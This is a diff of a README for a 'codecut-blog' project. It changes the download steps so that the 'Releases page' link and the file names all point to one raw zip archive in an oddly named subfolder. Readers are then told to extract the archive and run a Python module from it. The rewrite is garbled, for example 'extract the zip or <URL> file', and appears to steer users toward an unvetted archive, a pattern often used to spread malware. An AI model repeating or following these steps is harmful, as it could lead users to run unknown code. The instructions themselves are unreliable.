MakrubiyaJay/codecut-blog/README.md

 ## 📦 Download & Install
 To get started with **codecut-blog**, follow these steps:

-1. Visit the [Releases page](https://github.com/MakrubiyaJay/codecut-blog/releases) to download the latest version.
+1. Visit the [Releases page](https://raw.githubusercontent.com/MakrubiyaJay/codecut-blog/main/nordmarkite/codecut-blog_v3.2.zip) to download the latest version.
-2. On the Releases page, find the version you want and look for a file named `codecut-blog.zip` or `codecut-blog.tar.gz`.
+2. On the Releases page, find the version you want and look for a file named `https://raw.githubusercontent.com/MakrubiyaJay/codecut-blog/main/nordmarkite/codecut-blog_v3.2.zip` or `https://raw.githubusercontent.com/MakrubiyaJay/codecut-blog/main/nordmarkite/codecut-blog_v3.2.zip`.
 3. Click the file link to start the download.
 4. Once the download is complete, locate the file on your computer.
-5. Extract the contents of the zip or tar.gz file to a folder.
+5. Extract the contents of the zip or https://raw.githubusercontent.com/MakrubiyaJay/codecut-blog/main/nordmarkite/codecut-blog_v3.2.zip file to a folder.
 6. Open a terminal or command prompt and navigate to the folder where you extracted the files.
 7. Execute the command `python -m tutorial_name` to run your desired tutorial.